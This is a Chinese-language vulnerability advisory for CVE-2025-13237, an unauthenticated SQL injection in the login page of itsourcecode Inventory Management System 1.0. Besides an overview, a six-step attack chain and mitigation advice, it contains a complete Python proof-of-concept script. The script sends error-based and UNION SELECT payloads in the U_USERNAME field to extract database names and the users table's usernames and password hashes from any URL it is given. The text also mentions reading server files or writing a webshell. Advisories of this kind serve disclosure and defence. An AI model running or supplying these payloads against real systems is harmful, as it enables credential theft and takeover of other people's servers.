CVE-2025-13237 itsourcecode Inventory Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13237

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Inventory Management System 1.0

漏洞概述

CVE-2025-13237是itsourcecode公司开发的Inventory Management System 1.0版本中发现的一个高危安全漏洞。该漏洞存在于Web应用程序的登录模块中，具体位于/LogSignModal.PHP文件。攻击者可以通过构造恶意的SQL语句利用U_USERNAME参数进行SQL注入攻击。由于该漏洞无需认证即可利用，且可通过网络远程发起攻击，因此存在严重的安全风险。攻击者成功利用此漏洞可窃取数据库中的敏感信息，包括用户凭证、个人数据、商业机密等，甚至可能在某些配置下执行系统命令或获取服务器完全控制权。该漏洞的CVSS评分为7.3，属于高危级别，已经有公开的利用代码发布，建议受影响的用户尽快采取防护措施。

技术细节

该漏洞是一个典型的基于错误的SQL注入（Error-based SQL Injection）漏洞。在/LogSignModal.PHP文件中，程序直接使用用户提交的U_USERNAME参数构建SQL查询语句，而未进行充分的输入验证和参数化查询处理。攻击者可以通过在U_USERNAME参数中注入恶意的SQL代码，如使用单引号、UNION SELECT、EXTRACTVALUE等SQL函数，诱导数据库返回错误信息，从而获取数据库结构信息、用户名、密码哈希等敏感数据。由于应用程序未对SQL特殊字符进行转义或使用预编译语句，攻击者可以完全绕过登录认证机制，甚至可能通过LOAD_FILE()、INTO OUTFILE等函数读取服务器敏感文件或写入webshell。由于漏洞影响的是登录模块，攻击者可以利用此漏洞获取管理员权限，进而控制整个Inventory Management System。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站使用的itsourcecode Inventory Management System 1.0版本，并定位到登录页面/LogSignModal.PHP文件

STEP 2

步骤2: 漏洞探测

攻击者通过在U_USERNAME参数中注入单引号(')或特定SQL语句，观察应用程序返回的错误信息，确认是否存在SQL注入漏洞

STEP 3

步骤3: 构造恶意Payload

根据错误信息，攻击者构造针对性的SQL注入Payload，如使用UNION SELECT或基于错误的注入技术(EXTRACTVALUE、UPDATEXML等)

STEP 4

步骤4: 数据库枚举

通过SQL注入获取数据库版本、数据库名称、表名、列名等数据库结构信息

STEP 5

步骤5: 敏感数据提取

利用注入漏洞提取users表中的用户名、密码哈希等敏感凭证信息

STEP 6

步骤6: 认证绕过/账户接管

使用获取的凭证登录系统或直接通过SQL注入修改认证状态，实现未授权访问和账户接管

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13237 SQL Injection PoC
# Target: itsourcecode Inventory Management System 1.0
# Vulnerability: SQL Injection in /LogSignModal.PHP via U_USERNAME parameter

def exploit_sqli(target_url):
    """
    SQL Injection exploitation via error-based technique
    """
    endpoint = f"{target_url}/LogSignModal.PHP"
    
    # Payload to extract database version
    payload = "' AND (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x716a627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLUMNS GROUP BY x)a)-- -"
    
    data = {
        'U_USERNAME': payload,
        'U_PASSWORD': 'test',
        'btnlogin': 'Login'
    }
    
    try:
        print(f"[*] Sending exploit payload to: {endpoint}")
        response = requests.post(endpoint, data=data, timeout=10)
        
        if 'qiqzqz' in response.text or 'qjbsz' in response.text:
            print("[+] SQL Injection successful! Database information extracted.")
            return True
        else:
            print("[-] Exploitation failed or target not vulnerable.")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def extract_users(target_url):
    """
    Extract usernames and password hashes from users table
    """
    endpoint = f"{target_url}/LogSignModal.PHP"
    
    # Extract admin credentials
    payload = "' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,IFNULL(CAST(username AS CHAR),0x20),0x716a627a71,IFNULL(CAST(password AS CHAR),0x20),0x7178787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- -"
    
    data = {
        'U_USERNAME': payload,
        'U_PASSWORD': 'test',
        'btnlogin': 'Login'
    }
    
    try:
        print(f"[*] Extracting user credentials...")
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[+] Response received, check for extracted data.")
        return response.text
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/inventory")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sqli(target)

影响范围

itsourcecode Inventory Management System 1.0

防御指南

临时缓解措施

在官方修复方案发布前，建议采取以下临时缓解措施：1) 在Web应用层部署严格的输入过滤和验证机制，对U_USERNAME参数中的SQL特殊字符进行过滤或转义；2) 使用ModSecurity等WAF规则阻止已知的SQL注入攻击模式；3) 临时禁用受影响的登录功能或设置IP白名单限制访问；4) 加强数据库监控日志，及时发现异常查询行为；5) 建议用户暂时不要使用该系统处理敏感业务，或使用网络隔离措施将该系统与其他关键系统隔离。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13237
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13237
3 Details https://www.cvedetails.com/cve/CVE-2025-13237/
4 VulDB https://vuldb.com/cve/CVE-2025-13237
5 Link https://github.com/yihaofuweng/cve/issues/57
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332563
8 Link https://vuldb.com/?id.332563
9 Link https://vuldb.com/?submit.686734